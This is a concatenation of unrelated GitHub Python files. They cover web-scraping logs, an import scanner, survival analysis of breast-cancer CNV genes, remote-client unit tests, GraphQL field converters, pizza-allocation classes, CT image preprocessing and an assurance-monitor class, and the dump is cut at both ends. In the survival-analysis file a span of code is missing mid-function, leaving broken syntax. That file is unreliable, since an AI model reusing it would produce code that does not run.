open(\"college_data.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(item + \"\\n\")\n writer.close()\n\n# def write_collegeData_result(item):\n# with open(\"college_data_result.txt\", \"a+\", encoding=\"utf-8\") as writer:\n# writer.write(item + \"\\n\")\n# writer.close()\n\nclient = MongoClient(\"mongodb://localhost:27017/\")\nuni_ref = client.test.colleges\n\ndef append_college(data):\n # print(data)\n uni_ref.insert_one(data)\n\ndef college_scraped(url):\n with open(\"college_scraped_url.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(url + \"\\n\")\n writer.close()\n \n\ndef read_url():\n result = \"\"\n with open(\"college_data.txt\") as reader:\n result = reader.read()\n reader.close()\n return result\n ","repo_name":"MichaelTrzaskoma/455-ScholarshipRecommendation","sub_path":"backend/scrapping/scrap_log.py","file_name":"scrap_log.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31586532773","text":"#!/usr/bin/env python3\nimport ast\nimport yaml\nimport click\n\n\nclass Analyzer(ast.NodeVisitor):\n def __init__(self):\n self.import_stmt_stats = []\n\n def visit_Import(self, node):\n for alias in node.names:\n self.import_stmt_stats.append({\n \"pkg\": None,\n \"name\": alias.name,\n \"as\": alias.asname\n })\n self.generic_visit(node)\n\n def visit_ImportFrom(self, node):\n for alias in node.names:\n self.import_stmt_stats.append({\n \"pkg\": node.module,\n \"name\": alias.name,\n \"as\": alias.asname\n })\n self.generic_visit(node)\n\n def report(self, y):\n def build_py_import_stmt(i):\n as_clause = \" as {}\".format(i['as']) if i['as'] else \"\"\n from_clause = \"from {} \".format(i['pkg']) if i['pkg'] else \"\"\n import_stmt = \"{}import {}{}\".format(from_clause, i['name'], as_clause)\n return import_stmt\n\n if y:\n print(yaml.dump(self.import_stmt_stats))\n else:\n format_out = map(build_py_import_stmt, self.import_stmt_stats)\n for o in format_out:\n print(o)\n\n\n@click.command()\n@click.argument(\n 'py_src', required=True, type=click.File('r')\n)\n@click.option(\n '-y', help=\"Output result in yaml\", is_flag=True\n)\ndef main(py_src, y):\n \"\"\"Given python source, scan all the 'import' statements from AST\"\"\"\n tree = ast.parse(py_src.read())\n\n analyzer = Analyzer()\n analyzer.visit(tree)\n analyzer.report(y)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"werwty/dependency-analysis-pypi","sub_path":"code/poc/import_scan/import_scan.py","file_name":"import_scan.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11548824949","text":"#june 13 2018\n#construction kaplan meier curves based on CNV genes from Liu, et al 2018\nimport pandas as pd\nfrom lifelines.statistics import logrank_test\nfrom lifelines import KaplanMeierFitter\nfrom lifelines import CoxPHFitter\nfrom lifelines.utils import median_survival_times\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom statsmodels.sandbox.stats.multicomp import multipletests as mult\n\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('font',**{'family':'Arial','size': 18}),#'serif':['Times']})\nfont = {'family':'Arial','size': 16}\n\n#consider pulling these in programmatically\n#amps = ['AKIRIN1',\n#'HEYL',\n#'PPCS',\n#'TM2D1',\n#'INADL',\n#'PVRL4',\n#'GRHL1',\n#'KLF11',\n#'PRKCI',\n#'TBL1XR1',\n#'PIK3CA',\n#'TRIO',\n#'E2F3',\n#'SOX4',\n#'PTP4A1',\n#'MYB',\n#'EGFR',\n#'AUTS2',\n#'UBE3C',\n#'DNAJB6',\n#'ANKRD46',\n#'GRHL2',\n#'TRPS1',\n#'MYC',\n#'CCNE1',\n#'ADAM15']\n#\n#dels=['GAB1',\n#'MSRA',\n#'STXBP1',\n#'PTEN',\n#'BCL9L',\n#'RILPL2',\n#'KATNAL1',\n#'RB1',\n#'ARF6']\n\nhits = pd.concat([pd.read_excel('../../CNV_screen/tier0_postthesis_40-45_v2.xlsx',\n index_col='Unnamed: 0'),\n pd.read_excel('../../CNV_screen/tier0_ambiguousdeletions_v2_thru45.xlsx',\n index_col='Unnamed: 0'),\n pd.read_excel('../../CNV_screen/tier1.5 CNV screen/tier1.5_postthesis_40-45.xlsx',\n sheetname = 'tier1.5_sindura.csv',index_col='Unnamed: 0')])\n\n#hits = pd.concat([hits1,hits2])\nhits = hits[hits['Validation result'].astype(str).str.contains('\\+')].sort_values(\n ['Chromosome','from'])\n\n##side note--pull the mutsigcv q values\nmutsig=pd.read_csv('../Somatic_mutations/MutSigCV2015.sig_genes.txt',sep='\\t',\n index_col='gene')\nmuts = mutsig[mutsig.index.isin(hits.index)]\nprint(muts[['q']].reindex(hits.index).reset_index(drop=False).drop_duplicates())\nprint(muts[['q']].reindex(hits.index).reset_index(drop=False).drop_duplicates().q.to_csv(index=False))\n\ngenes = hits.index.unique().tolist()\n\namps = hits[hits['CNV type']=='amp'].index.unique().tolist()\ndels = hits[hits['CNV type']=='del'].index.unique().tolist()\n\npan = pd.read_excel('1-s2.0-S0092867418302290-mmc1.xlsx',sheetname='TCGA-CDR')\nbrca = pan[pan.type=='BRCA'].set_index('bcr_patient_barcode')\n\n#cnv = pd.read_csv('../../running scripts/CNVruns/new_TN_CNV_run/BRCA_CNVs_foldchange_TN_filtered2.csv',\n# index_col='TCGA_ID')\ncnv = pd.read_csv('../../running scripts/CNVruns/new_TN_CNV_run/BRCA_CNVs_foldchange_all_filtered2.csv',\n index_col='TCGA_ID')\ncnv = cnv[genes]\n\nbrca = brca.merge(cnv,how='right',left_index=True,right_index=True)\n#brca.to_csv('BRCA_CNVgenes_TN_survivalendpoints_UPDATEASNEEDED.csv')\nbrca.to_csv('BRCA_CNVgenes_survivalendpoints_UPDATEASNEEDED.csv')\n\nbrca = pd.read_csv('BRCA_CNVgenes_survivalendpoints_UPDATEASNEEDED.csv',index_col=0,header=0)\n#brca = pd.read_csv('BRCA_CNVgenes_TN_survivalendpoints_UPDATEASNEEDED.csv',index_col=0,header=0)\n\namptest = pd.DataFrame(index=amps,data=[np.nan]*len(amps))\ndeltest = pd.DataFrame(index=dels,data=[np.nan]*len(dels))\nampmeds = amptest.copy()\ndelmeds = deltest.copy()\n\npoints = ['OS','PFI','DSS','DFI'] #,'DSS','DFI'\n\n##RANDOMLY SHUFFLE FOR COMPARISON - COMMENT THIS OUT WHEN GETTING REAL RESULTS\n#for time in points:\n# np.random.shuffle(brca[time+'.time'])\n\ndef lr(row,cutoff,endpoint):\n \n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])\n\n lrtest = logrank_test(test[test[gene]>cutoff][endtime],\n test[test[gene]<=cutoff][endtime],\n test[test[gene]>cutoff][endpoint],\n test[test[gene]<=cutoff][endpoint],\n alpha=0.99)\n\n return lrtest.p_value\n\ndef med(row,cutoff,endpoint):\n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])\n\n kmf = KaplanMeierFitter()\n\n kmf.fit(test[test[gene]<=cutoff][endtime],\n event_observed=test[test[gene]<=cutoff][endpoint])\n less = kmf.median_survival_time_\n kmf.fit(test[test[gene]>cutoff][endtime],\n event_observed=test[test[gene]>cutoff][endpoint])\n greater = kmf.median_survival_time_\n return greater-less\n\ndef cox(row,cutoff,endpoint):\n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])[[endpoint,endtime,gene]]\n \n if cutoff>1:\n test[gene]=test[gene].apply(lambda x: x>cutoff).replace({True:1,False:0})\n else:\n test[gene]=test[gene].apply(lambda x: xcutoff][endtime],\n event_observed=test[test[gene]>cutoff][endpoint],label='>'+str(cutoff)[:4])\n kmf.plot(ax=ax, color = colors[1])\n\n plt.ylim([0,1])\n plt.title(endpoint+' for '+gene)\n plt.xlabel('Time (days)')\n if endpoint=='OS':\n plt.ylabel('Survival')\n else:\n plt.ylabel('Fraction event-free')\n #plt.show()\n plt.tight_layout()\n plt.savefig(gene+'_'+endpoint+'_'+tag+'.pdf')\n\n\n\ncols = [col for col in rslt.columns if 'logrank_p' in col]\nrslt[(rslt[cols]<0.1).any(axis=1)]\n\n\n#TN:\n# OS_logrank_p PFI_logrank_p DSS_logrank_p DFI_logrank_p \\\n#E2F3 0.183591 0.086201 0.258809 0.219509 \n#SOX4 0.175186 0.065615 0.208570 0.138703 \n#STXBP1 0.012682 0.127284 0.122741 0.086020 \n#PTEN 0.036200 0.231327 0.116317 0.160458\n# \n##I don't really believe these plots. It looks like an effect of small numbers. so still with the whole dataset analysis\n#kmplot('E2F3',a,'PFI',('gray','r'),'TN')\n#kmplot('SOX4',a,'PFI',('gray','r'),'TN')\n#kmplot('STXBP1',d,'OS',('b','gray'),'TN')\n#kmplot('PTEN',d,'OS',('b','gray'),'TN')\n\n# PFI_logrank_fdr DSS_logrank_fdr DFI_logrank_fdr \n#E2F3 0.864501 0.98276 0.973847 \n#SOX4 0.864501 0.98276 0.973847 \n#STXBP1 0.864501 0.98276 0.973847 \n#PTEN 0.864501 0.98276 0.973847 \n# \n# OS_HR PFI_HR DSS_HR DFI_HR \n#E2F3 0.470532 0.351289 0.419432 0.394332 \n#SOX4 0.463583 0.327940 0.382721 0.331641 \n#STXBP1 -5.381682 -2.351322 -3.174719 -3.566318 \n#PTEN -4.371333 -2.003874 -4.667613 -2.926956 \n\n# OS_logrank_p PFI_logrank_p DSS_logrank_p DFI_logrank_p \\\n#AKIRIN1 0.176707 0.005876 0.062265 0.008160 \n#HEYL 0.352724 0.023095 0.228750 0.017141 \n#PPCS 0.773287 0.011658 0.184049 0.157269 \n#GRHL1 0.091250 0.107012 0.080021 0.192757 \n#KLF11 0.102229 0.111394 0.086857 0.192499 \n#SOX4 0.664678 0.245921 0.736185 0.076216 \n#MYB 0.043401 0.131926 0.024732 0.882551 \n#ANKRD46 0.054446 0.484441 0.044372 0.147595 \n#GRHL2 0.064398 0.366083 0.048345 0.077426 \n#TRPS1 0.031825 0.237945 0.023735 0.084968 \n#MYC 0.039543 0.360481 0.019710 0.089503 \n#MSRA 0.017381 0.385540 0.008645 0.049973 \n\nkmplot('AKIRIN1',a,'PFI',('gray','r'),'all')\nkmplot('HEYL',a,'PFI',('gray','r'),'all')\nkmplot('PPCS',a,'PFI',('gray','r'),'all')\nkmplot('RBM34',a,'OS',('gray','r'),'all')\nkmplot('GRHL1',a,'OS',('gray','r'),'all')\n#skip KLF - DSS and DFI are unreliable\nkmplot('C6orf203',a,'OS',('gray','r'),'all')\nkmplot('MYB',a,'OS',('gray','r'),'all')\nkmplot('ANKRD46',a,'OS',('gray','r'),'all')\nkmplot('GRHL2',a,'OS',('gray','r'),'all')\nkmplot('TRPS1',a,'OS',('gray','r'),'all')\nkmplot('MYC',a,'OS',('gray','r'),'all')\nkmplot('MSRA',d,'OS',('b','gray'),'all')\nkmplot('SERPINB8',d,'OS',('b','gray'),'all')\n#kmplot('MSRA',a,'OS',('gray','r'),'all_amp')\n#kmplot('MSRA',a,'PFI',('gray','r'),'all_amp')\n\n# PFI_logrank_fdr DSS_logrank_fdr DFI_logrank_fdr \n#AKIRIN1 0.198187 0.302432 0.277445 \n#HEYL 0.261748 0.555536 0.291398 \n#PPCS 0.198187 0.521473 0.546143 \n#GRHL1 0.541057 0.328127 0.546143 \n#KLF11 0.541057 0.328127 0.546143 \n#SOX4 0.648719 0.834343 0.434728 \n#MYB 0.560683 0.210221 0.974558 \n#ANKRD46 0.648719 0.273955 0.546143 \n#GRHL2 0.648719 0.273955 0.434728 \n#TRPS1 0.648719 0.210221 0.434728 \n#MYC 0.648719 0.210221 0.434728 \n#MSRA 0.648719 0.210221 0.434728 \n#\n# OS_HR PFI_HR DSS_HR DFI_HR \n#AKIRIN1 1.444811 2.019048 1.865499 2.393684 \n#HEYL 1.310729 1.847518 1.563176 2.280106 \n#PPCS 1.091283 1.906732 1.596665 1.643713 \n#GRHL1 1.582633 1.572157 1.847055 1.619827 \n#KLF11 1.559040 1.563259 1.822085 1.620272 \n#SOX4 1.103948 0.740498 1.108164 0.502084 \n#MYB 1.660638 1.491670 2.006785 0.943099 \n#ANKRD46 1.401133 1.130754 1.623986 1.400625 \n#GRHL2 1.387621 1.174565 1.623142 1.519926 \n#TRPS1 1.469788 1.232945 1.746612 1.495852 \n#MYC 1.448980 1.176948 1.796522 1.496191 \n#MSRA -0.662768 -0.859999 -0.534009 -0.638937 \n\n#15 genes out of 34 were significant on some measure. but no significant fdrs\n#12 significnat on some measure for whole dataset. 10 if you exclude DSS and DFI. \n###this is probably the metric I care most about.\n\n#after randomizing patient endpoints:\n#15 from whole analysis - 12 if you exclude DSS and DFI.\n#8 from TN analysis\n# skip the TN analysis, it looks lik garbage anyway\n ","repo_name":"jennifereldiaz/fly-tnbc","sub_path":"kmcurves.py","file_name":"kmcurves.py","file_ext":"py","file_size_in_byte":12236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29958528630","text":"\nimport os\nimport sremote.tools as remote\nfrom sremote.api import RemoteClient\n\nimport unittest\n\n\nclass TestRemoteClient(unittest.TestCase):\n \"\"\"Abstract class to define unittests for specific implementations\"\"\"\n \n \n def setUp(self):\n self._connector = self.create_connector()\n self._client=RemoteClient(self._connector)\n \n def create_connector(self):\n return None\n \n def test_do_remote_call(self):\n self._configure_remote_environment()\n self._client.register_remote_env_path(\"/mypath\")\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"PATH\"])\n \n self.assertIn(\"/mypath\", response)\n \n self._client.register_remote_env_variable(\"MYVAR\", \"VALUE1\")\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"MYVAR\"])\n \n self.assertEqual(\"VALUE1\", response)\n \n self._client.register_remote_env_variable(\"PATH\", \"VALUE1\", True)\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"PATH\"])\n \n self.assertNotEqual(\"VALUE1\", response)\n \n with self.assertRaises(remote.ExceptionRemoteExecError):\n response, stdout= self._client.do_remote_call(\n module_name=\"kkk\",\n method_name=\"getenv\",\n args=[\"PATH\"])\n \n with self.assertRaises(remote.ExceptionRemoteExecError):\n response, stdout= self._client.do_remote_call(\n module_name=\"os\",\n method_name=\"kkk\",\n args=[\"PATH\"])\n \n \n def test_do_install_git_module(self):\n self._configure_remote_environment()\n self.assertTrue(self._client.do_install_git_module(\n \"https://bitbucket.org/berkeleylab/qdo.git\",\n \"remote\", keep_after=\"mydir\"))\n self._client.register_remote_module(\"qdo\")\n response, stdout= self._client.do_remote_call(module_name=\"qdo.remote\",\n method_name=\"get_version\")\n self.assertIn(\"0.\", response)\n \n self.assertTrue(self._connector.retrieve_file(\n \"/tmp/sremote_test/tmp/mydir/README.md\", \n \"/tmp/README.md\"))\n \n def test_register_remote_module_negative(self):\n #- Positive is tested in test_do_install_git_module\n self._configure_remote_environment()\n self._client.register_remote_module(\"kkk\")\n with self.assertRaises(remote.ExceptionRemoteModulesError):\n response, stdout= self._client.do_remote_call(\n module_name=\"os\",\n method_name=\"getenv\",\n args=[\"PATH\"])\n \n def test_get_resource_route(self):\n route=self._client.get_resource_route(\"interpreter.sh\")\n self.assertTrue(os.path.isfile(route))\n \n def _configure_remote_environment(self):\n self._connector.set_sremote_dir(\"/tmp/sremote_test\")\n self._connector.set_tmp_dir(\"/tmp/sremote_test\") \n self.assertTrue(self._client.do_bootstrap_install())","repo_name":"gonzalorodrigo/sremote","sub_path":"test/test_remote_client.py","file_name":"test_remote_client.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"10353278764","text":"import graphene\nfrom django.db.models.query import QuerySet\nfrom django_measurement.models import MeasurementField\nfrom django_prices.models import MoneyField, TaxedMoneyField\nfrom graphene_django.converter import convert_django_field\nfrom graphene_django.fields import DjangoConnectionField\n\nfrom graphene.relay import PageInfo\nfrom graphql_relay.connection.arrayconnection import connection_from_list_slice\n\nfrom .types.common import Weight\nfrom .types.money import Money, TaxedMoney\n\n\n@convert_django_field.register(TaxedMoneyField)\ndef convert_field_taxed_money(field, registry=None):\n return graphene.Field(TaxedMoney)\n\n\n@convert_django_field.register(MoneyField)\ndef convert_field_money(field, registry=None):\n return graphene.Field(Money)\n\n\n@convert_django_field.register(MeasurementField)\ndef convert_field_measurements(field, registry=None):\n return graphene.Field(Weight)\n\n\nclass PrefetchingConnectionField(DjangoConnectionField):\n\n @classmethod\n def resolve_connection(cls, connection, default_manager, args, iterable):\n if iterable is None:\n iterable = default_manager\n\n if isinstance(iterable, QuerySet):\n _len = iterable.count()\n else:\n _len = len(iterable)\n\n connection = connection_from_list_slice(\n iterable,\n args,\n slice_start=0,\n list_length=_len,\n list_slice_length=_len,\n connection_type=connection,\n edge_type=connection.Edge,\n pageinfo_type=PageInfo,\n )\n connection.iterable = iterable\n connection.length = _len\n return connection\n","repo_name":"IvanVrecicDev/Python","sub_path":"saleor-master/saleor/graphql/core/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22200816178","text":"\n\nclass Pizza():\n \"\"\"docstring for Pizza.\"\"\"\n\n def __init__(self, index, ingredients=[], lenn=-1):\n self.idx = index\n if lenn == -1:\n self.num_ingr = len(ingredients)\n else:\n self.num_ingr = lenn\n self.ingr = ingredients\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.idx}, {self.ingr})\"\n\nclass Team():\n \"\"\"docstring for Team.\"\"\"\n\n def __init__(self, people):\n self.people = people\n self.pizzas = []\n self.weight = 1\n\n def __repr__(self):\n pizzas = \"\".join(\"%s, \" % repr(x) for x in self.pizzas)\n return f\"{self.__class__.__name__}%d(\" % self.people + pizzas[:-2] + \")\"\n\n def __str__(self):\n return f\"{self.people} \" + \" \".join(\"%d\" % x.idx for x in self.pizzas)\n\n #@property\n #def\n\n\nclass CustomMtx(object):\n \"\"\"docstring for CustomMtx.\"\"\"\n\n def __init__(self, Pizza_list = []):\n super(CustomMtx, self).__init__()\n\n self.y_axis = []\n self.x_axis = []\n aux = []\n\n idx = 0\n for p in Pizza_list:\n self.x_axis.append([idx, p])\n idx += 1\n aux.extend(p.ingr)\n\n len_x = len(self.x_axis)\n aux = dict.fromkeys(aux)\n for key in aux.keys():\n aux[key] = [False]*len_x\n for it in range(len_x):\n for ing in self.x_axis[it][1].ingr:\n aux[ing][it] = True\n\n self.mtx = []\n keys, values = [], []\n for x,y in aux.items():\n keys.append(x)\n values.append(y)\n\n for idx in range(len(keys)):\n self.y_axis.append([idx, keys[idx], values[idx].count(True)])\n\n for it in range(len_x):\n self.mtx.append([])\n for i in range(len(self.y_axis)):\n self.mtx[it].append(values[i][it])\n\n def pop_xl(self, i = []):\n # return pizzas, not PizzaTuple\n i.sort()\n res = []\n for value in range(len(i)):\n res.append(self.x_axis.pop(i[value] - value)[1])\n return res\n\n # COSTOSO!\n def print(self):\n row_format = \"{:>6}\" * (len(self.y_axis)+1)\n ingr_list = [(x[1][:2] + '..') if len(x[1]) > 3 else x[1] for x in self.y_axis] #\n ingr_list.insert(0, \" \")\n str = row_format.format(*ingr_list) + \"\\n\"\n for x in self.x_axis:\n ingr = self.mtx[x[0]]\n aux = []\n for y in self.y_axis:\n if ingr[y[0]]:\n aux.append(\"X\")\n else:\n aux.append(\" \")\n row_format = \"p{:<6}\" + \"{:>6}\" * len(self.y_axis)\n str = str + row_format.format(x[1].idx, *aux) + \"\\n\"\n return str\n\n def extend_xaxis_pizzaWeight(self):\n aux = {}\n len_y = len(self.y_axis)\n for x in range(len_y):\n aux[self.y_axis[x][1]] = x\n\n aux2 = []\n for PizzaTuple in self.x_axis:\n val = 0\n for ing in PizzaTuple[1].ingr:\n if aux[ing] > val:\n val = aux[ing]\n PizzaTuple.append(self.mtx[PizzaTuple[0]].count(True)*len_y)#+val)\n aux2.append(PizzaTuple)\n self.x_axis = aux2\n","repo_name":"Uncastellum/Hashcode","sub_path":"Practice-2021/PizzaMtx.py","file_name":"PizzaMtx.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26592044740","text":"import nibabel as nib\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n# https://www.kaggle.com/kmader/show-3d-nifti-images\nimport numpy as np\nimport tqdm as tqdm\n\ndata_path = './sample/data'\nlabel_path = './sample/label'\ndata_file_list = sorted(os.listdir(data_path))\nlabel_file_list = sorted(os.listdir(label_path))\n\nivh = 0\nich = 0\n\nfor d in range(len(data_file_list)):\n\n ct_path = './sample/data/'+data_file_list[d]\n ct = nib.load(ct_path)\n ct = ct.get_fdata()\n\n mask_path = './sample/label/'+label_file_list[d]\n mask = nib.load(mask_path)\n mask = mask.get_fdata()\n\n ct = np.transpose(ct,(2,0,1))\n mask = np.transpose(mask,(2,0,1))\n\n # ct data slice\n ct = ct[:32, :512, :512]\n mask = mask[:32, :512, :512]\n\n c, w, h = ct.shape\n if w!=512 or h!=512:\n print(data_file_list[d])\n\n if c < 32:\n z_padding = 32-c\n ct = np.pad(ct, ((0, z_padding), (0, 0), (0, 0)), 'constant')\n mask = np.pad(mask, ((0, z_padding), (0, 0), (0, 0)), 'constant')\n\n for i in range(len(ct)):\n ct[i] = np.where(ct[i] < 0, 0, ct[i])\n ct[i] = np.where(ct[i] > 140, 255, ct[i])\n ct[i] = np.where(ct[i] == 255, ct[i]/140*255, ct[i])\n\n c_path = './sample_preprocessing/data/' + data_file_list[d][:3]\n m_path = './sample_preprocessing/label/' + label_file_list[d][:4]\n\n # print(m_path, i+1)\n # print(np.where(mask[i] == 1, True, False).sum())\n\n # ich_check = np.where(mask[i] == 1, True, False)\n # if ich_check.sum() != 0:\n # ich += 1\n #\n # ivh_check = np.where(mask[i] == 2, True, False)\n # if ivh_check.sum() != 0:\n # print(m_path, i+1)\n # ivh += 1\n\n if not os.path.exists(c_path):\n os.makedirs(c_path)\n if not os.path.exists(m_path):\n os.makedirs(m_path)\n\n c_path2 = c_path + '/{:03d}.png'.format(i+1)\n m_path2 = m_path + '/m{:03d}.png'.format(i+1)\n\n\n # cv2.imwrite(c_path2, ct[i])\n # cv2.imwrite(m_path2, mask[i])\n\n # # 시각화해서 검증시\n plt.imsave(c_path2, ct[i])\n plt.imsave(m_path2, mask[i])\n\n","repo_name":"WonJunPark/brain_ct_to_rgb","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15762005172","text":"import turtle\n\n\nnum = int(input(\"cantidad\"))\na = turtle.Turtle()\na.speed(0)\na.hideturtle()\nscreen = turtle.Screen()\n\n\n\n\n\n\nact = 1\nfor i in range(num):\n for x in range(act):\n for p in range(2):\n a.dot(4)\n a.forward(5)\n a.left(90)\n act += 1\n\nscreen.exitonclick()\n","repo_name":"Tormenta88/pitoncode","sub_path":"A1C1/TrabajoDiscreta/tryingspirals.py","file_name":"tryingspirals.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20507587495","text":"#!/usr/bin/python\nimport os\nimport sys\nimport pickle\nimport collections\nimport numpy as np\nfrom scipy import stats\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import backend as K\nimport tensorflow as tf\nfrom selective_classification_config import Config as SConfig\n\n\nclass ICAD():\n\n def __init__(self, folder_path, num_classes, window_size=0):\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n tf.get_logger().setLevel('INFO')\n\n physical_devices = tf.config.list_physical_devices('GPU')\n try:\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\n except:\n pass\n\n self.num_classes = num_classes\n self.window_size = window_size\n\n self.model_path = folder_path\n self.classifier_model = None\n self.siamese_model = None\n self.calibration_nc = None\n self.centroids = None\n self.a_s = 0.9\n self.b_s = -0.3\n self.threshold_s = -0.145\n self.a_c = 0\n self.b_c = 0\n self.theshold_c = 0\n self.comb_type = None\n self.comb_function = None\n self.comb_am_config = None\n self.p_values = None\n self.use_sequence = False\n self.config = SConfig(self.model_path)\n self.best_correct_ratio_params = []\n self.best_no_decision_ratio_params = []\n\n print('model path', self.model_path)\n\n lec_weights_path = os.path.join(self.model_path, \"classifier_model.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"..\", \"classifier_model.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"model_weights.h5\")\n if (not os.path.exists(lec_weights_path)):\n lec_weights_path = os.path.join(\n self.model_path, \"..\", \"model_weights.h5\")\n\n nc_calibration_path = os.path.join(\n self.model_path, \"calibration_nc_scores.pickle\")\n siamese_model_path = os.path.join(self.model_path, \"siamese_model.h5\")\n snapshot_parameter_path = os.path.join(\n self.model_path, \"snapshot.pickle\")\n sequence_parameter_path = os.path.join(\n self.model_path, \"sequence.pickle\")\n\n msg = \"\"\n if (not os.path.exists(lec_weights_path)):\n msg += \" LEC Weights\"\n if (not os.path.exists(siamese_model_path)):\n msg += \" Siamese Model\"\n if (not os.path.exists(nc_calibration_path)):\n msg += \" Calibration Score\"\n if (not os.path.exists(snapshot_parameter_path)):\n msg += \" a,b, threshold values\"\n\n if msg:\n complete_msg = 'Cannot load assurance monitor. Missing - '+msg\n raise ValueError(complete_msg)\n self.siamese_model = load_model(siamese_model_path)\n self.classifier_model = self.load_network(\n self.model_path, lec_weights_path)\n\n if (self.classifier_model is None):\n raise ValueError(\"Cannot load classifier network\")\n\n with open(nc_calibration_path, \"rb\") as f:\n self.calibration_nc, self.centroids = pickle.load(f)\n\n if os.path.exists(snapshot_parameter_path):\n with open(snapshot_parameter_path, \"rb\") as f:\n self.a_s, self.b_s, self.threshold_s = pickle.load(f)\n else:\n print (\n 'Cannot find snapshot_parameters.pickle. using default snapshot parameters')\n\n if os.path.exists(sequence_parameter_path):\n with open(sequence_parameter_path, \"rb\") as f:\n\n self.best_correct_ratio_params, self.best_no_decision_ratio_params = pickle.load(\n f)\n print(self.best_correct_ratio_params)\n self.window_size = self.best_correct_ratio_params[0]\n self.comb_type = self.best_correct_ratio_params[1]\n self.comb_function = self.best_correct_ratio_params[2]\n self.a_c = self.best_correct_ratio_params[3]\n self.b_c = self.best_correct_ratio_params[4]\n self.threshold_c = self.best_correct_ratio_params[5]\n self.use_sequence = True\n self.load_sequence_configurations(self.model_path)\n # print(self.a_c)\n # print(self.b_c)\n # print(self.threshold_c)\n else:\n print ('Cannot find sequence_parameters.pickle. Not using sequence am')\n\n # Snapshot p vales:\n self.p_values = np.empty(self.num_classes)\n\n if (self.window_size):\n # self.p_value_window = = np.empty(self.window_size, self.num_classes)\n self.p_value_window = collections.deque(maxlen=self.window_size)\n self.conf_window = collections.deque(maxlen=self.window_size)\n self.cred_window = collections.deque(maxlen=self.window_size)\n else:\n self.p_value_window = None\n self.conf_window = None\n self.cred_window = None\n\n #self.a_s = 0.9\n #self.b_s = -0.3\n # self.threshold_s = 0.6#-0.145\n # print(self.threshold_c)\n #self.threshold_c = 0.6\n\n sys.setrecursionlimit(40000)\n\n def load_network(self, model_path, lec_weights_path):\n import imp\n print('model_path ', model_path)\n network_path = os.path.join(model_path, \"LECModel.py\")\n\n if (not os.path.exists(network_path)):\n network_path = os.path.join(model_path, '..', 'LECModel.py')\n if (os.path.exists(network_path)):\n print('network_path ', network_path)\n if (os.path.exists(lec_weights_path)):\n self.netpath = network_path\n mods = imp.load_source('LEC_Model', network_path)\n if ('get_model' in dir(mods)):\n net = mods.get_model()\n net.load_weights(lec_weights_path)\n print('loaded weights from {0}'.format(lec_weights_path))\n return net\n else:\n print ('cannot load weights from {0}'.format(lec_weights_path))\n return None\n\n def load_sequence_configurations(self, model_path):\n import imp\n comb_am_config_path = os.path.join(model_path, \"comb_am_config.py\")\n print('comb_am_config_path', comb_am_config_path)\n if (not os.path.exists(comb_am_config_path)):\n comb_am_config_path = os.path.join(\n model_path, \"..\", \"comb_am_config.py\")\n if (os.path.exists(comb_am_config_path)):\n mods = imp.load_source('comb_am_config', comb_am_config_path)\n if ('Config' in dir(mods)):\n self.comb_am_config = mods.Config()\n\n def evaluate(self, lec_input):\n # if (self.thresholds == None):\n # raise ValueError(\"Threshold value is not set\")\n #print('thresholds {}, {}'.format(self.threshold_s,self.threshold_c))\n\n # compute embedding representation using the siamese network\n test_emb = self.siamese_model.predict(lec_input)\n prediction = np.argmax(self.classifier_model.predict(\n lec_input)) # LEC's classification\n softmax = np.max(prediction) # LEC's classification softmax value\n\n p_values = np.empty(self.num_classes)\n centroid_distances = np.zeros(self.num_classes)\n for j in range(self.num_classes):\n centroid_distances[j] = np.linalg.norm(\n test_emb - self.centroids[j])\n for j in range(self.num_classes):\n temp_nc = centroid_distances[j] / float(\n np.min(centroid_distances[np.arange(len(centroid_distances)) != j]))\n p_values[j] = np.count_nonzero(self.calibration_nc >= temp_nc) / float(\n len(self.calibration_nc)) # Compute a p-value for each class\n # Credibility for the classification\n credibility = p_values[prediction]\n # Confidence for the classification\n confidence = 1 - \\\n np.max(p_values[np.arange(len(p_values)) != prediction])\n\n decisions = {}\n decisions[\"comb\"] = 0\n decisions[\"snapshot\"] = 0\n\n self.p_values = 